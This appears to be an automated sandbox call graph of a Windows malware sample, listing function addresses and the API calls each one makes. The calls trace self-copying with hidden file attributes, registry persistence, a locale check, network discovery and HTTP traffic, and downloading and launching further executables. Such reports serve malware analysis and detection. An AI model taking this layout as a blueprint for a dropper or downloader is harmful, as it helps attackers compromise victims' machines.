4355->4356 4357 40773a Sleep RegOpenKeyExW 4355->4357 4412 40e970 GetLocaleInfoA strcmp 4356->4412 4358 407793 RegOpenKeyExW 4357->4358 4359 407767 RegSetValueExA RegCloseKey 4357->4359 4361 4077b5 RegSetValueExA RegCloseKey 4358->4361 4362 4077e6 RegOpenKeyExW 4358->4362 4359->4358 4364 4078e2 RegOpenKeyExW 4361->4364 4365 407808 RegCreateKeyExW RegCloseKey 4362->4365 4366 40783d RegOpenKeyExW 4362->4366 4369 407930 RegOpenKeyExW 4364->4369 4370 407904 RegSetValueExA RegCloseKey 4364->4370 4365->4366 4373 407894 RegOpenKeyExW 4366->4373 4374 40785f RegCreateKeyExW RegCloseKey 4366->4374 4367 4075c0 ExitProcess 4368 4075c8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4371 407687 Sleep wsprintfW CopyFileW 4368->4371 4372 407618 SetFileAttributesW RegOpenKeyExW 4368->4372 4376 407952 RegSetValueExA RegCloseKey 4369->4376 4377 40797e RegOpenKeyExA 4369->4377 4370->4369 4371->4357 4378 4076cb SetFileAttributesW RegOpenKeyExW 4371->4378 4372->4371 4375 407649 wcslen RegSetValueExW RegCloseKey 4372->4375 4373->4364 4379 4078b6 RegSetValueExA RegCloseKey 4373->4379 4374->4373 4375->4371 4376->4377 4380 4079a4 8 API calls 4377->4380 4381 407a8a RegOpenKeyExA 4377->4381 4378->4357 4382 4076fc wcslen RegSetValueExW RegCloseKey 4378->4382 4379->4364 4380->4381 4383 407ab0 8 API calls 4381->4383 4384 407b96 Sleep 4381->4384 4382->4357 4383->4384 4414 40ca10 4384->4414 4387 407bb1 9 API calls 4417 405b60 InitializeCriticalSection CreateFileW 4387->4417 5245 405820 4387->5245 5254 406b30 Sleep GetModuleFileNameW 4387->5254 5268 407380 4387->5268 4389 407d1d 4394 407c66 CreateEventA 4449 40c140 4394->4449 4403 40d3a0 17 API calls 4404 407cc6 4403->4404 4405 40d3a0 17 API calls 4404->4405 4406 407ce2 4405->4406 4407 40d3a0 17 API calls 4406->4407 4408 407cfd 4407->4408 4494 40d510 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4408->4494 4410 407d0e 4503 40d650 4410->4503 4413 4075b8 4412->4413 4413->4367 4413->4368 4512 40c9e0 4414->4512 4418 405c85 4417->4418 4419 405b98 CreateFileMappingW 4417->4419 4431 40d880 CoInitializeEx 4418->4431 4420 405bb9 MapViewOfFile 4419->4420 4421 405c7b CloseHandle 4419->4421 4422 405c71 CloseHandle 4420->4422 4423 405bd8 GetFileSize 4420->4423 4421->4418 4422->4421 4427 405bed 4423->4427 4424 405c67 UnmapViewOfFile 4424->4422 4425 405bfc 4425->4424 4427->4424 4427->4425 4428 405c2c 4427->4428 4641 40ca60 4427->4641 4648 405c90 4427->4648 4429 40a3f0 _invalid_parameter 3 API calls 4428->4429 4429->4425 4959 40d950 socket 4431->4959 4433 407c61 4444 406f50 CoInitializeEx SysAllocString 4433->4444 4436 40d8a0 4436->4433 4437 40d8ea 4436->4437 4443 40d928 4436->4443 4969 40dbc0 4436->4969 4984 40acc0 htons 4437->4984 4442 40e6b0 24 API calls 4442->4443 5003 40a510 4443->5003 4445 406f72 4444->4445 4446 406f88 CoUninitialize 4444->4446 5148 406fa0 4445->5148 4446->4394 5157 40c100 4449->5157 4452 40c100 3 API calls 4453 40c15e 4452->4453 4454 40c100 3 API calls 4453->4454 4455 40c16e 4454->4455 4456 40c100 3 API calls 4455->4456 4457 407c7e 4456->4457 4458 40d370 4457->4458 4459 409fd0 7 API calls 4458->4459 4460 40d37b 4459->4460 4461 407c88 4460->4461 4462 40d387 InitializeCriticalSection 4460->4462 4463 40b500 InitializeCriticalSection 4461->4463 4462->4461 4468 40b51a 4463->4468 4464 40b549 CreateFileW 4466 40b570 CreateFileMappingW 4464->4466 4467 40b632 4464->4467 4470 40b591 MapViewOfFile 4466->4470 4471 40b628 CloseHandle 4466->4471 5213 40ada0 EnterCriticalSection 4467->5213 4468->4464 5164 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4468->5164 5165 40b0e0 4468->5165 4474 40b5ac GetFileSize 4470->4474 4475 40b61e CloseHandle 4470->4475 4471->4467 4473 40b637 4476 40d3a0 17 API calls 4473->4476 4480 40b5cb 4474->4480 4475->4471 4477 407c92 4476->4477 4482 40d3a0 4477->4482 4478 40b614 UnmapViewOfFile 4478->4475 4480->4478 4481 40b0e0 32 API calls 4480->4481 5212 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4480->5212 4481->4480 4483 40d3b7 EnterCriticalSection 4482->4483 4484 407caa 4482->4484 5240 40d490 4483->5240 4484->4403 4487 40d47b LeaveCriticalSection 4487->4484 4488 40a220 9 API calls 4489 40d3f9 4488->4489 4489->4487 4490 40d40b CreateThread 4489->4490 4490->4487 4491 40d42e 4490->4491 4492 40d452 GetCurrentProcess GetCurrentProcess DuplicateHandle 4491->4492 4493 40d474 4491->4493 4492->4493 4493->4487 4495 40d546 InterlockedExchangeAdd 4494->4495 4496 40d629 GetCurrentThread SetThreadPriority 4494->4496 4495->4496 4499 40d560 4495->4499 4496->4410 4497 40d579 EnterCriticalSection 4497->4499 4498 40d5e7 LeaveCriticalSection 4498->4499 4501 40d5fe 4498->4501 4499->4496 4499->4497 4499->4498 4500 40d5c3 WaitForSingleObject 4499->4500 4499->4501 4502 40d61c Sleep 4499->4502 4500->4499 4501->4496 4502->4499 4504 40d6d2 4503->4504 4505 40d65c EnterCriticalSection 4503->4505 4504->4389 4506 40d678 4505->4506 4507 40d6a0 LeaveCriticalSection DeleteCriticalSection 4506->4507 4508 40d68b CloseHandle 4506->4508 4509 40a3f0 _invalid_parameter 3 API calls 4507->4509 4508->4506 4510 40d6c6 4509->4510 4511 40a3f0 _invalid_parameter 3 API calls 4510->4511 4511->4504 4515 40c630 4512->4515 4516 40c64e 4515->4516 4519 40c663 4515->4519 4521 40c690 4516->4521 4518 407ba6 4518->4387 4518->4389 4519->4518 4547 40c810 4519->4547 4522 40c742 4521->4522 4523 40c6b9 4521->4523 4525 409fd0 7 API calls 4522->4525 4546 40c73a 4522->4546 4523->4546 4581 409fd0 4523->4581 4527 40c768 4525->4527 4530 402420 7 API calls 4527->4530 4527->4546 4531 40c795 4530->4531 4533 4024e0 10 API calls 4531->4533 4535 40c7af 4533->4535 4534 40c70f 4536 402420 7 API calls 4534->4536 4537 402420 7 API calls 4535->4537 4538 40c720 4536->4538 4539 40c7c0 4537->4539 4540 4024e0 10 API calls 4538->4540 4541 4024e0 10 API calls 4539->4541 4540->4546 4542 40c7da 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c7eb 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4518 4548 40c839 4547->4548 4549 40c8ea 4547->4549 4550 409fd0 7 API calls 4548->4550 4580 40c8e2 4548->4580 4551 409fd0 7 API calls 4549->4551 4549->4580 4552 40c84f 4550->4552 4553 40c90e 4551->4553 4554 402420 7 API calls 4552->4554 4552->4580 4556 402420 7 API calls 4553->4556 4553->4580 4555 40c873 4554->4555 4557 409fd0 7 API calls 4555->4557 4558 40c932 4556->4558 4559 40c882 4557->4559 4560 409fd0 7 API calls 4558->4560 4561 4024e0 10 API calls 4559->4561 4562 40c941 4560->4562 4563 40c8ab 4561->4563 4564 4024e0 10 API calls 4562->4564 4565 40a3f0 _invalid_parameter 3 API calls 4563->4565 4566 40c96a 4564->4566 4567 40c8b7 4565->4567 4568 40a3f0 _invalid_parameter 3 API calls 4566->4568 4569 402420 7 API calls 4567->4569 4570 40c976 4568->4570 4571 40c8c8 4569->4571 4572 402420 7 API calls 4570->4572 4573 4024e0 10 API calls 4571->4573 4574 40c987 4572->4574 4573->4580 4575 4024e0 10 API calls 4574->4575 4576 40c9a1 4575->4576 4577 402420 7 API calls 4576->4577 4578 40c9b2 4577->4578 4579 4024e0 10 API calls 4578->4579 4579->4580 4580->4518 4592 409ff0 4581->4592 4584 402420 4613 40a1e0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 40a090 GetCurrentProcessId 4592->4601 4594 409ffb 4595 40a007 _invalid_parameter 4594->4595 4602 40a0b0 4594->4602 4597 409fde 4595->4597 4598 40a022 HeapAlloc 4595->4598 4597->4546 4597->4584 4598->4597 4599 40a049 _invalid_parameter 4598->4599 4599->4597 4600 40a064 memset 4599->4600 4600->4597 4601->4594 4610 40a090 GetCurrentProcessId 4602->4610 4604 40a0b9 4605 40a0d6 HeapCreate 4604->4605 4611 40a120 GetProcessHeaps 4604->4611 4607 40a0f0 HeapSetInformation GetCurrentProcessId 4605->4607 4608 40a117 4605->4608 4607->4608 4608->4595 4610->4604 4612 40a0cc 4611->4612 4612->4605 4612->4608 4614 409ff0 _invalid_parameter 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 40a1e0 _invalid_parameter 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4622 402551 4620->4622 4621->4622 4623 40a1e0 _invalid_parameter 7 API calls 4621->4623 4622->4591 4626 4025b2 _invalid_parameter 4623->4626 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4627 40a3f0 _invalid_parameter 3 API calls 4625->4627 4626->4624 4630 40a3f0 4626->4630 4627->4622 4637 40a090 GetCurrentProcessId 4630->4637 4632 40a3fb 4633 4025df 4632->4633 4638 40a330 4632->4638 4633->4624 4636 40a417 HeapFree 4636->4633 4637->4632 4639 40a360 HeapValidate 4638->4639 4640 40a380 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a460 4641->4658 4646 40a3f0 _invalid_parameter 3 API calls 4647 40caa1 4646->4647 4647->4427 4871 40a220 4648->4871 4651 405cca memcpy 4653 40a460 8 API calls 4651->4653 4652 405d88 4652->4427 4654 405d01 4653->4654 4881 40c3d0 4654->4881 4662 40a48d 4658->4662 4659 40a1e0 _invalid_parameter 7 API calls 4659->4662 4660 40a4a2 4660->4647 4663 40bf70 4660->4663 4661 40a4a4 memcpy 4661->4662 4662->4659 4662->4660 4662->4661 4671 40bf7a 4663->4671 4665 40bf99 4665->4646 4665->4647 4667 40bfb1 memcmp 4667->4671 4668 40bfd8 4669 40a3f0 _invalid_parameter 3 API calls 4668->4669 4669->4665 4670 40a3f0 _invalid_parameter 3 API calls 4670->4671 4671->4665 4671->4667 4671->4668 4671->4670 4672 40c460 4671->4672 4686 407d30 4671->4686 4673 40c46f _invalid_parameter 4672->4673 4674 40a1e0 _invalid_parameter 7 API calls 4673->4674 4676 40c479 4673->4676 4675 40c508 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4671 4678 40c51d 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c525 4679->4680 4682 40c57d _invalid_parameter 4680->4682 4689 40c5d0 4680->4689 4694 402470 4682->4694 4685 402470 3 API calls 4685->4676 4802 409f50 4686->4802 4690 4024e0 10 API calls 4689->4690 4691 40c5e4 4690->4691 4700 4026f0 4691->4700 4693 40c5fc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a3f0 _invalid_parameter 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a3f0 _invalid_parameter 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 40285b 4738->4739 4741 402866 4738->4741 4740 40a3f0 _invalid_parameter 3 API calls 4739->4740 4740->4741 4741->4734 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4747 404103 4743->4747 4744->4737 4772 403ca0 4745->4772 4748 40413d 4747->4748 4749 40415e 4747->4749 4782 404680 4748->4782 4750 402820 _invalid_parameter 7 API calls 4749->4750 4752 40416f 4750->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403cda _invalid_parameter 4776->4777 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4779 403d3a _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4791 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4791 4788 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4791 4789 404841 _invalid_parameter 4790 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4789->4790 4792 404867 _invalid_parameter 4789->4792 4790->4789 4791->4788 4791->4789 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4799 403db8 _invalid_parameter 4798->4799 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4801 403de3 4799->4801 4800->4799 4801->4761 4803 409f62 4802->4803 4806 409eb0 4803->4806 4807 40a1e0 _invalid_parameter 7 API calls 4806->4807 4809 409ec0 4807->4809 4812 407d4f 4809->4812 4813 409efc 4809->4813 4815 4093e0 4809->4815 4822 4099d0 4809->4822 4827 409da0 4809->4827 4811 40a3f0 _invalid_parameter 3 API calls 4811->4812 4812->4671 4813->4811 4816 4093f3 4815->4816 4821 4093e9 4815->4821 4817 409436 memset 4816->4817 4816->4821 4818 409457 4817->4818 4817->4821 4819 40945d memcpy 4818->4819 4818->4821 4835 4091b0 4819->4835 4821->4809 4823 4099dd 4822->4823 4824 4099e7 4822->4824 4823->4809 4824->4823 4825 409adf memcpy 4824->4825 4840 409700 4824->4840 4825->4824 4828 409db6 4827->4828 4833 409dac 4827->4833 4829 409700 64 API calls 4828->4829 4828->4833 4830 409e37 4829->4830 4831 4091b0 6 API calls 4830->4831 4830->4833 4832 409e56 4831->4832 4832->4833 4834 409e6b memcpy 4832->4834 4833->4809 4834->4833 4836 4091fe 4835->4836 4837 4091be 4835->4837 4836->4821 4837->4836 4839 4090f0 6 API calls 4837->4839 4839->4837 4841 409710 4840->4841 4842 40971a 4840->4842 4841->4824 4842->4841 4850 409540 4842->4850 4845 409858 memcpy 4845->4841 4847 409877 memcpy 4848 4099a1 4847->4848 4849 409700 62 API calls 4848->4849 4849->4841 4851 409557 4850->4851 4858 40954d 4850->4858 4853 4095e5 4851->4853 4854 4095c8 4851->4854 4851->4858 4860 4095e0 4851->4860 4857 4091b0 6 API calls 4853->4857 4856 4091b0 6 API calls 4854->4856 4856->4860 4857->4860 4858->4841 4858->4845 4858->4847 4859 40968c memset 4859->4858 4861 408ea0 4860->4861 4862 408eb9 4861->4862 4870 408eaf 4861->4870 4863 408d70 9 API calls 4862->4863 4862->4870 4864 408fb2 4863->4864 4865 40a1e0 _invalid_parameter 7 API calls 4864->4865 4866 409001 4865->4866 4867 408be0 46 API calls 4866->4867 4866->4870 4868 40902e 4867->4868 4869 40a3f0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4868->4869 4869->4870 4870->4858 4870->4859 4890 40a090 GetCurrentProcessId 4871->4890 4873 40a22b 4874 40a0b0 _invalid_parameter 5 API calls 4873->4874 4878 40a237 _invalid_parameter 4873->4878 4874->4878 4875 40a330 _invalid_parameter HeapValidate 4875->4878 4876 40a2e0 HeapAlloc 4876->4878 4877 40a2aa HeapReAlloc 4877->4878 4878->4875 4878->4876 4878->4877 4879 40a3f0 _invalid_parameter 3 API calls 4878->4879 4880 405cb5 4878->4880 4879->4878 4880->4651 4880->4652 4884 40c3db 4881->4884 4882 40a1e0 _invalid_parameter 7 API calls 4882->4884 4883 405d4d 4883->4652 4885 407280 4883->4885 4884->4882 4884->4883 4886 40a1e0 _invalid_parameter 7 API calls 4885->4886 4887 407290 4886->4887 4888 4072d7 4887->4888 4889 40729c memcpy CreateThread CloseHandle 4887->4889 4888->4652 4889->4888 4891 4072e0 4889->4891 4890->4873 4892 407347 4891->4892 4898 4072f1 4891->4898 4893 407345 4892->4893 4896 40ed20 64 API calls 4892->4896 4894 40a3f0 _invalid_parameter 3 API calls 4893->4894 4897 407372 4894->4897 4895 407300 StrChrA 4895->4898 4896->4893 4898->4893 4898->4895 4901 40ed20 9 API calls 4898->4901 4902 40ede3 InternetOpenUrlW 4901->4902 4903 40ef4e InternetCloseHandle Sleep 4901->4903 4904 40ef41 InternetCloseHandle 4902->4904 4905 40ee12 CreateFileW 4902->4905 4906 40ef75 7 API calls 4903->4906 4907 40732f Sleep 4903->4907 4904->4903 4908 40ee41 InternetReadFile 4905->4908 4909 40ef34 CloseHandle 4905->4909 4906->4907 4910 40f004 wsprintfW DeleteFileW Sleep 4906->4910 4907->4898 4911 40ee94 CloseHandle wsprintfW DeleteFileW Sleep 4908->4911 4912 40ee65 4908->4912 4909->4904 4913 40ea00 21 API calls 4910->4913 4929 40ea00 CreateFileW 4911->4929 4912->4911 4914 40ee6e WriteFile 4912->4914 4916 40f044 4913->4916 4914->4908 4918 40f082 DeleteFileW 4916->4918 4919 40f04e Sleep 4916->4919 4918->4907 4922 40ebc0 6 API calls 4919->4922 4920 40ef27 DeleteFileW 4920->4909 4921 40eeeb Sleep 4951 40ebc0 memset memset CreateProcessW 4921->4951 4924 40f065 4922->4924 4924->4907 4926 40f078 ExitProcess 4924->4926 4927 40ef16 ExitProcess 4928 40ef1e 4928->4909 4930 40ea45 CreateFileMappingW 4929->4930 4931 40eb5a 4929->4931 4932 40eb50 CloseHandle 4930->4932 4933 40ea66 MapViewOfFile 4930->4933 4934 40eb60 CreateFileW 4931->4934 4935 40ebb1 4931->4935 4932->4931 4936 40ea85 GetFileSize 4933->4936 4937 40eb46 CloseHandle 4933->4937 4938 40eb82 WriteFile CloseHandle 4934->4938 4939 40eba8 4934->4939 4935->4920 4935->4921 4940 40eaa1 4936->4940 4941 40eb3c UnmapViewOfFile 4936->4941 4937->4932 4938->4939 4942 40a3f0 _invalid_parameter 3 API calls 4939->4942 4956 40ca30 4940->4956 4941->4937 4942->4935 4945 40c3d0 7 API calls 4946 40eaf0 4945->4946 4946->4941 4947 40eb0d memcmp 4946->4947 4947->4941 4948 40eb29 4947->4948 4949 40a3f0 _invalid_parameter 3 API calls 4948->4949 4950 40eb32 4949->4950 4950->4941 4952 40ec31 ShellExecuteW 4951->4952 4953 40ec22 Sleep 4951->4953 4954 40ec66 4952->4954 4955 40ec57 Sleep 4952->4955 4953->4954 4954->4927 4954->4928 4955->4954 4957 40c460 10 API calls 4956->4957 4958 40ca54 4957->4958 4958->4941 4958->4945 4960 40d97d htons inet_addr setsockopt 4959->4960 4965 40daae 4959->4965 4961 40acc0 8 API calls 4960->4961 4962 40d9f6 bind lstrlenA sendto ioctlsocket 4961->4962 4968 40da4b 4962->4968 4965->4436 4966 40da72 5016 40ad80 shutdown closesocket 4966->5016 4967 40a220 9 API calls 4967->4968 4968->4966 4968->4967 5007 40dad0 4968->5007 5023 40de00 memset InternetCrackUrlA InternetOpenA 4969->5023 4972 40dcde 4972->4436 4974 40a3f0 _invalid_parameter 3 API calls 4974->4972 4978 40dcab 4978->4974 4981 40dca1 SysFreeString 4981->4978 5130 40ac80 inet_addr 4984->5130 4987 40ad1c connect 4988 40ad30 getsockname 4987->4988 4989 40ad64 4987->4989 4988->4989 5133 40ad80 shutdown closesocket 4989->5133 4991 40ad6d 4992 40e6b0 4991->4992 5134 40ac60 inet_ntoa 4992->5134 4994 40e6c6 4995 40cc30 11 API calls 4994->4995 4996 40e6e5 4995->4996 5002 40d90c 4996->5002 5135 40e730 memset InternetCrackUrlA InternetOpenA 4996->5135 4999 40a3f0 _invalid_parameter 3 API calls 5001 40e71c 4999->5001 5000 40a3f0 _invalid_parameter 3 API calls 5000->5002 5001->5000 5002->4442 5004 40a514 5003->5004 5005 40a51a 5004->5005 5006 40a3f0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5004->5006 5005->4433 5006->5004 5015 40daec 5007->5015 5008 40dbb4 5008->4968 5009 40db08 recvfrom 5010 40db36 StrCmpNIA 5009->5010 5011 40db29 Sleep 5009->5011 5012 40db55 StrStrIA 5010->5012 5010->5015 5011->5015 5013 40db76 StrChrA 5012->5013 5012->5015 5017 40cae0 5013->5017 5015->5008 5015->5009 5016->4965 5019 40caeb 5017->5019 5018 40caf1 lstrlenA 5018->5019 5020 40cb04 5018->5020 5019->5018 5019->5020 5021 40a1e0 _invalid_parameter 7 API calls 5019->5021 5022 40cb20 memcpy 5019->5022 5020->5015 5021->5019 5022->5019 5022->5020 5024 40dea1 InternetConnectA 5023->5024 5025 40dbda 5023->5025 5026 40e00a InternetCloseHandle 5024->5026 5027 40deda HttpOpenRequestA 5024->5027 5025->4972 5036 40dcf0 5025->5036 5026->5025 5028 40df10 HttpSendRequestA 5027->5028 5029 40dffd InternetCloseHandle 5027->5029 5030 40dff0 InternetCloseHandle 5028->5030 5032 40df2d 5028->5032 5029->5026 5030->5029 5031 40df4e InternetReadFile 5031->5032 5033 40df7b 5031->5033 5032->5031 5032->5033 5034 40a220 9 API calls 5032->5034 5033->5030 5035 40df96 memcpy 5034->5035 5035->5032 5065 405630 5036->5065 5039 40dbf3 5039->4978 5046 40e660 5039->5046 5040 40dd1a SysAllocString 5041 40dd31 CoCreateInstance 5040->5041 5042 40dde7 5040->5042 5043 40dddd SysFreeString 5041->5043 5045 40dd56 5041->5045 5044 40a3f0 _invalid_parameter 3 API calls 5042->5044 5043->5042 5044->5039 5045->5043 5082 40e1b0 5046->5082 5049 40e030 5087 40e480 5049->5087 5052 40dc72 5052->4981 5062 40cc30 5052->5062 5055 40e5e0 6 API calls 5056 40e087 5055->5056 5056->5052 5104 40e2a0 5056->5104 5059 40e2a0 6 API calls 5060 40e0bf 5059->5060 5060->5052 5109 40e150 5060->5109 5125 40cba0 5062->5125 5066 40563d 5065->5066 5067 405643 lstrlenA 5066->5067 5069 40a1e0 _invalid_parameter 7 API calls 5066->5069 5071 405656 5066->5071 5072 40a3f0 _invalid_parameter 3 API calls 5066->5072 5073 4055d0 5066->5073 5077 405580 5066->5077 5067->5066 5067->5071 5069->5066 5071->5039 5071->5040 5072->5066 5074 4055e7 MultiByteToWideChar 5073->5074 5075 4055da lstrlenA 5073->5075 5076 40560c 5074->5076 5075->5074 5076->5066 5078 40558b 5077->5078 5079 405591 lstrlenA 5078->5079 5080 4055d0 2 API calls 5078->5080 5081 4055c7 5078->5081 5079->5078 5080->5078 5081->5066 5085 40e1d6 5082->5085 5083 40dc5d 5083->4978 5083->5049 5084 40e253 lstrcmpiW 5084->5085 5086 40e26b SysFreeString 5084->5086 5085->5083 5085->5084 5085->5086 5086->5085 5089 40e4a6 5087->5089 5088 40e04b 5088->5052 5099 40e5e0 5088->5099 5089->5088 5090 40e533 lstrcmpiW 5089->5090 5091 40e5b3 SysFreeString 5090->5091 5092 40e546 5090->5092 5091->5088 5093 40e150 2 API calls 5092->5093 5095 40e554 5093->5095 5094 40e5a5 5094->5091 5095->5091 5095->5094 5096 40e583 lstrcmpiW 5095->5096 5097 40e595 5096->5097 5098 40e59b SysFreeString 5096->5098 5097->5098 5098->5094 5100 40e150 2 API calls 5099->5100 5102 40e5fb 5100->5102 5101 40e069 5101->5052 5101->5055 5102->5101 5103 40e480 6 API calls 5102->5103 5103->5101 5105 40e150 2 API calls 5104->5105 5106 40e2bb 5105->5106 5108 40e0a5 5106->5108 5113 40e320 5106->5113 5108->5059 5108->5060 5111 40e176 5109->5111 5110 40e18d 5110->5052 5111->5110 5112 40e1b0 2 API calls 5111->5112 5112->5110 5115 40e346 5113->5115 5114 40e45d 5114->5108 5115->5114 5116 40e3d3 lstrcmpiW 5115->5116 5117 40e453 SysFreeString 5116->5117 5118 40e3e6 5116->5118 5117->5114 5119 40e150 2 API calls 5118->5119 5121 40e3f4 5119->5121 5120 40e445 5120->5117 5121->5117 5121->5120 5122 40e423 lstrcmpiW 5121->5122 5123 40e435 5122->5123 5124 40e43b SysFreeString 5122->5124 5123->5124 5124->5120 5129 40cbad 5125->5129 5126 40cb50 _vscprintf wvsprintfA 5126->5129 5127 40cbc8 SysFreeString 5127->4981 5128 40a220 9 API calls 5128->5129 5129->5126 5129->5127 5129->5128 5131 40acac socket 5130->5131 5132 40ac99 gethostbyname 5130->5132 5131->4987 5131->4991 5132->5131 5133->4991 5134->4994 5136 40e707 5135->5136 5137 40e7d4 InternetConnectA 5135->5137 5136->4999 5136->5001 5138 40e954 InternetCloseHandle 5137->5138 5139 40e80d HttpOpenRequestA 5137->5139 5138->5136 5140 40e843 HttpAddRequestHeadersA HttpSendRequestA 5139->5140 5141 40e947 InternetCloseHandle 5139->5141 5142 40e93a InternetCloseHandle 5140->5142 5145 40e88d 5140->5145 5141->5138 5142->5141 5143 40e8a4 InternetReadFile 5144 40e8d1 5143->5144 5143->5145 5144->5142 5145->5143 5145->5144 5146 40a220 9 API calls 5145->5146 5147 40e8ec memcpy 5146->5147 5147->5145 5153 406fd7 5148->5153 5149 4071ab 5151 4071b4 SysFreeString 5149->5151 5152 406f7b SysFreeString 5149->5152 5150 40a3f0 _invalid_parameter 3 API calls 5150->5149 5151->5152 5152->4446 5154 407230 CoCreateInstance 5153->5154 5155 407126 SysAllocString 5153->5155 5156 406ff2 5153->5156 5154->5153 5155->5153 5155->5156 5156->5149 5156->5150 5158 40c10e 5157->5158 5160 40c10a 5157->5160 5161 40c0c0 CryptAcquireContextW 5158->5161 5160->4452 5162 40c0fb 5161->5162 5163 40c0dd CryptGenRandom CryptReleaseContext 5161->5163 5162->5160 5163->5162 5164->4468 5216 40b010 gethostname 5165->5216 5169 40b10c strcmp 5170 40b121 5169->5170 5171 40b0f9 5169->5171 5220 40ac60 inet_ntoa 5170->5220 5171->4468 5173 40b12f strstr 5174 40b180 5173->5174 5175 40b13f 5173->5175 5223 40ac60 inet_ntoa 5174->5223 5221 40ac60 inet_ntoa 5175->5221 5178 40b18e strstr 5180 40b19e 5178->5180 5181 40b1df 5178->5181 5179 40b14d strstr 5179->5171 5182 40b15d 5179->5182 5224 40ac60 inet_ntoa 5180->5224 5226 40ac60 inet_ntoa 5181->5226 5222 40ac60 inet_ntoa 5182->5222 5186 40b1ac strstr 5186->5171 5189 40b1bc 5186->5189 5187 40b1ed strstr 5190 40b1fd 5187->5190 5191 40b23e EnterCriticalSection 5187->5191 5188 40b16b strstr 5188->5171 5188->5174 5225 40ac60 inet_ntoa 5189->5225 5227 40ac60 inet_ntoa 5190->5227 5192 40b256 5191->5192 5202 40b281 5192->5202 5229 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5192->5229 5195 40b1ca strstr 5195->5171 5195->5181 5196 40b20b strstr 5196->5171 5197 40b21b 5196->5197 5228 40ac60 inet_ntoa 5197->5228 5200 40b229 strstr 5200->5171 5200->5191 5201 40b37a LeaveCriticalSection 5201->5171 5202->5201 5203 409fd0 7 API calls 5202->5203 5204 40b2c5 5203->5204 5204->5201 5230 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5204->5230 5206 40b2e3 5207 40b310 5206->5207 